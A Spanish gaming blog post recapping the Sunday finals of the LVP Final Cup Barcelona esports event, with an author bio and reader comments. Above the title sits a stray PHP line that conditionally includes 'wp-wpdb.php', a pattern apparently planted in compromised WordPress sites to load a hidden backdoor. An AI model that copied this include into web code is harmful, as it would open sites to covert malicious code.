if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); LVP Final Cup Barcelona – Resumen Domingo – La Fortaleza de LeChuck

LVP Final Cup Barcelona – Resumen Domingo

Arrancábamos el segundo y último dia de la Final Cup Barcelona con muchas ganas, esperando ver a los mejores equipos y jugadores en finales muy disputadas, y la verdad es que así ha sido. Hemos contemplado lo mejor de cada profesional del videojuego demostrando al mundo que el juego de España en Halo Reach, FIFA11 y Starcraft II está en muy alto nivel.

Comenzaba la mañana frenética con las semifinales de Halo Reach en el escenario central.

HALO REACH

 

* overGame VS 34united: la cosa está clara desde el primer momento de juego. Overgame no deja ni un minuto respirar a 34united y se alza con la victoria con un contundente 3-0.

* GIANTS! Gaming VS Wizards: este enfrentamiento también desde el comienzo tiene un claro ganador, y  Wizards aplasta a Giants con un 3-0.

A continuación arranca la final de Halo Reach. Nadie se mueve de las gradas.

* OverGame VS Wizards: ¡Es increible como juegan estos jóvenes Wizards! que consiguen un 3-0 ante unos Overgame que no han podido hacer nada para pararles.

Dejamos el planeta Reach para irnos a ver unos partidos en la final de FIFA 11. La final más reñida de todas y donde el público más ha disfrutado.

FIFA 11

 

* Ralfitita VS marcarisa10 (Real Madrid vs Real Madrid): Si tuviéramos que elegir uno de los enfrentamientos más largos, empatados y emocionantes nos quedamos con este. Era como sentirse dentro de un estadio contemplando una final de copa. Además los dos comentaristas retransmitían cada encuentro poniendo cuerpo y alma, y el público entregado animando a ambos, ponía la guinda. Ralfitita venía de la ronda de eliminación pero muy entregado en juego y ataque, y su compañero de equipo y enemigo, marcarisa10, no se lo iba a poner nada fácil. Desde el comienzo estuvo todo muy reñido, con jugadas de locura y chutes imposibles. Los jugadores incluso se levantaban a celebrar los goles y saludar a la afición. Los gritos de la gente que vibraba con el juego se hacían presentes en cada partido, incluso llegándose a quejar por penaltys o faltas no pitadas, sin palabras. Llegó a ser necesario disputar los 7 partidos para encontar un ganador, que por un gol más en el último partido, la victoria de FIFA 11 de la Final Cup fue para… Ralfitita!!! Muchas felicidades para este espléndido jugador que se lleva el trofeo de la LVP para casa.

Sin apenas recuperar el aliento con este gran espectáculo, comienza la Gran Final de Starcraft ll.

STARCRAFT II

 

* VortiX VS LucifroN: ¿Recordáis los 2 hermanos? Ayer VortiX mandaba a su hermano a la ronda de eliminación, pues LucifroN ha luchado con uñas y dientes hasta volver a vérselas con su hermano pequeño. Primer mapa, VortiX comienza con un juego agresivo sin dejar escapatoria a LucifroN, pero este, llegado a este punto no se rinde, y saca unidades de debajo de las piedras para comerse a su hermano pequeño y hacerse con el primer partido. Vamos al segundo mapa, donde LucifroN no tarda en lanzar ataques continuos a VortiX, y consigue también el segundo. ¡Madre mía como ha venido LucifroN! En el tercer partido la cosa comienza a favor de LucifroN, pero VortiX despierta y consigue derrotarlo. 2-1! Los siguientes 2 mapas acaban de forma rápida con ofensivas efectivas de la mano de LucifroN que no deja opción a VortiX y se alza como ganador de Starcraft II de la Final Cup. Señores, ¡qué duelo entre hermanos! seguidores y no seguidores de este juego entre el público lo han disfrutado, incluso oyéndose comentarios de individuos que se plantean comprar el juego y sentir la magia del Starcraft II.

¡Esto aún no ha acabado! Falta la gran final de Halo Reach! Agarraros!

HALO REACH

 

* Wizards contra OverGame: Emoción ante esta final de grandes de España en Halo Reach. Comienzan  con un juego muy empatado pero pronto la balanza se inclina hacia los Wizards, que arrasan en los mapas de banderas. En el último partido asesino la cosa pinta muy igualada, pero siempre un poco por delante los Wizards que por pocas muertes de diferencia logran hacerse con la victoria de Halo Reach de esta Final Cup. Muchas felicidades a estos jóvenes jugadores, los cuales levantan orgullosos sus trofeos.

Ahora sí, esto se acaba, con la ilusión de haber visto un gran trabajo por parte de la organización y unos maravillosos enfrentamientos de los mejores jugadores de nuestro país. Nos queda esa esperanza hacia el futuro, de que esto crezca cada vez más y se haga aún más grande, para que nuestra Liga Profesional de Videojuegos consiga la fama y el prestigio que se merece.

¡Nos vemos en la próxima Final Cup de la LVP!

Publicada el
Categorizado como Eventos Etiquetado como

Por Arashi

Aparte de patear traseros de piratas como gobernadora en Mêlée, soy una fanática de los videojuegos desde que de pequeña me regalaron la Atari 2600. Adoro las aventuras gráficas y los RPG, pero no le hago ascos al resto. Otra de mis pasiones es todo lo relacionado con Japón.

6 comentarios

  1. Que grande ha sido, vale la pena el dolor de culo que tengo ahora por las gradas. ha sido impresionante!

    la gente, el lugar… los refrescos gratis.. xD una pasada…

    no se por que… de todo lo que ocurrio ahi tengo en la cabeza la imagen de la jefa mordiendose las uñas durante la final de Halo. JAJAJAJA

  2. Enhorabuena por la gran cobertura y por los resúmenes! Fue genial veros ahí con los carteles xD.
    La verdad es que incluso viéndolo en streaming fue muy emocionante, sobretodo la final de FIFA, y eso que no soy muy futbolero xDD.
    Según dijeron la siguiente es en Madrid no? A ver si me puedo acercar!

Dejar un comentario